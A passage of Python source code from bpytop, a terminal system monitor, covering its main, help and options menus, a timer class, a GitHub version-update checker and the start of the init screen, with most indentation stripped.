out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, shift+h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up, k) (Down, j)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left, h) (Right, l)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(s)" : "Toggle showing swap as a disk.",
"(i)" : "Toggle disks io mode with big graphs.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a NON case-sensitive process filter.",
"(shift+f)" : "Input a case-sensitive process filter.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (shift+t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (shift+k)" : "Kill selected process with SIGKILL - 9.",
"Selected (shift+i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "H", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
selected_cat: str = ""
selected_int: int = 0
option_items: Dict[str, List[str]] = {}
cat_list: List[str] = []
cat_int: int = 0
change_cat: bool = False
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
categories: Dict[str, Dict[str, List[str]]] = {
"system" : {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"truecolor" : [
'Sets if 24-bit truecolor should be used.',
'(Requires restart to take effect!)',
'',
'Will convert 24-bit colors to 256 color',
'(6x6x6 color cube) if False.',
'',
'Set to False if your terminal doesn\'t have',
'truecolor support and can\'t convert to',
'256-color.'],
"shown_boxes" : [
'Manually set which boxes to show.',
'',
'Available values are "cpu mem net proc".',
					'Separate values with whitespace.',
'',
'Toggle between presets with mode key "m".'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'(Only visible if cpu box is enabled!)',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'"/uptime" = system uptime',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
					'Set this to False if the menus are flickering',
'too much for a comfortable experience.'],
"show_battery" : [
'Show battery stats.',
'(Only visible if cpu box is enabled!)',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
					'The init screen is purely cosmetic and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
},
"cpu" : {
"cpu_graph_upper" : [
'Sets the CPU stat shown in upper half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_graph_lower" : [
'Sets the CPU stat shown in lower half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_invert_lower" : [
'Toggles orientation of the lower CPU graph.',
'',
'True or False.'],
"cpu_single_graph" : [
'Completely disable the lower CPU graph.',
'',
'Shows only upper CPU graph and resizes it',
'to fit to box height.',
'',
'True or False.'],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"show_uptime" : [
'Shows the system uptime in the CPU box.',
'',
'Can also be shown in the clock by using',
'"/uptime" in the formatting.',
'',
'True or False.'],
},
"mem" : {
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"show_io_stat" : [
'Toggle small IO stat graphs.',
'',
'Toggles the small IO graphs for the regular',
'disk usage view.',
'',
'True or False.'],
"io_mode" : [
'Toggles io mode for disks.',
'',
'Shows big graphs for disk read/write speeds',
'instead of used/free percentage meters.',
'',
'True or False.'],
"io_graph_combined" : [
'Toggle combined read and write graphs.',
'',
'Only has effect if "io mode" is True.',
'',
'True or False.'],
"io_graph_speeds" : [
'Set top speeds for the io graphs.',
'',
					'Manually set which speed in MiB/s equals',
'100 percent in the io graphs.',
'(10 MiB/s by default).',
'',
'Format: "device:speed" seperate disks with a',
'comma ",".',
'',
'Example: "/dev/sda:100, /dev/sdb:20".'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"only_physical" : [
'Filter out non physical disks.',
'',
'Set this to False to include network disks,',
'RAM disks and similar.',
'',
'True or False.'],
"use_fstab" : [
'Read disks list from /etc/fstab.',
					'(Has no effect on macOS)',
'',
'This also disables only_physical.',
'',
'True or False.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be full path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma ",".',
'Begin line with "exclude=" to change to exclude',
'filter.',
					'Otherwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=/boot, /home/user"'],
},
"net" : {
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
					'rescales down to 10 KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"net_iface" : [
'Network Interface.',
'',
'Manually set the starting Network Interface.',
'Will otherwise automatically choose the NIC',
'with the highest total download since boot.'],
},
"proc" : {
"proc_update_mult" : [
'Processes update multiplier.',
'Sets how often the process list is updated as',
'a multiplier of "update_ms".',
'',
'Set to 2 or higher to greatly decrease bpytop',
'cpu usage. (Only integers)'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
					'Sets the depth where the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
					'If True and the process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'],
}
}
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
cpu_graph_i: Dict[str, int] = { "cpu_graph_upper" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_upper),
"cpu_graph_lower" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_lower)}
color_i: int
max_opt_len: int = max([len(categories[x]) for x in categories]) * 2
cat_list = list(categories)
while not cls.close:
key = ""
if cls.resized or change_cat:
cls.resized = change_cat = False
selected_cat = list(categories)[cat_int]
option_items = categories[cat_list[cat_int]]
option_len: int = len(option_items) * 2
y = 12 if Term.height < max_opt_len + 13 else Term.height // 2 - max_opt_len // 2 + 7
out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = min(Term.height-1-y, option_len), 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cat_width = floor((w+w2) / len(categories))
out_misc += f'{Fx.b}'
for cx, cat in enumerate(categories):
out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
if cat == selected_cat:
out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
else:
out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
out_misc += f'{Fx.ub}'
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = pages if selected_int == -1 and pages > 0 else 1
selected_int = 0 if selected_int >= 0 else len(option_items) - 1
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {CONFIG.sorting_options.index(CONFIG.proc_sorting) + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
elif opt in ["cpu_graph_upper", "cpu_graph_lower"]:
counter = f' {cpu_graph_i[opt] + 1}/{len(CONFIG.cpu_percent_fields)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor", "cpu_graph_upper", "cpu_graph_lower"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
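				#* Translate mouse clicks into key presses: the category tabs select a category, a click on the
				#* selected option row acts as left/right/enter, a click on another row just selects it,
				#* and any click outside the box closes the menu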
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w + w2 and y - 4 < my < y:
# if my == y - 2:
for cx, cat in enumerate(categories):
ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
if ccx - 2 < mx < ccx + 2 + len(cat):
key = str(cx+1)
break
elif x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "proc_update_mult":
if not input_val or int(input_val) < 1:
CONFIG.proc_update_mult = 1
else:
CONFIG.proc_update_mult = int(input_val)
Collector.proc_counter = 1
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif selected == "shown_boxes":
new_boxes: List = []
for box in input_val.split():
if box in ["cpu", "mem", "net", "proc"]:
new_boxes.append(box)
CONFIG.shown_boxes = " ".join(new_boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
elif selected == "io_graph_speeds":
MemBox.graph_speeds = {}
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and (page == pages or pages == 0)):
if cat_int == len(categories) - 1:
cat_int = 0
else:
cat_int += 1
change_cat = True
elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
if cat_int == 0:
cat_int = len(categories) - 1
else:
cat_int -= 1
change_cat = True
selected_int = -1 if key != "shift_tab" else 0
elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
cat_int = int(key) - 1
change_cat = True
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
"net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface", "io_graph_speeds"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
CONFIG.proc_update_mult -= 1
Collector.proc_counter = 1
elif key == "right" and selected == "proc_update_mult":
CONFIG.proc_update_mult += 1
Collector.proc_counter = 1
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected in ["cpu_graph_upper", "cpu_graph_lower"]:
if key == "left":
cpu_graph_i[selected] -= 1
if cpu_graph_i[selected] < 0: cpu_graph_i[selected] = len(CONFIG.cpu_percent_fields) - 1
if key == "right":
cpu_graph_i[selected] += 1
if cpu_graph_i[selected] > len(CONFIG.cpu_percent_fields) - 1: cpu_graph_i[selected] = 0
setattr(CONFIG, selected, CONFIG.cpu_percent_fields[cpu_graph_i[selected]])
setattr(CpuCollector, selected.replace("_graph", ""), [])
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["up", "mouse_scroll_up"]:
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key in ["down", "mouse_scroll_down"]:
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key == "page_up":
if not pages or page == 1:
selected_int = 0
else:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key == "page_down":
if not pages or page == pages:
selected_int = len(option_items) - 1
else:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
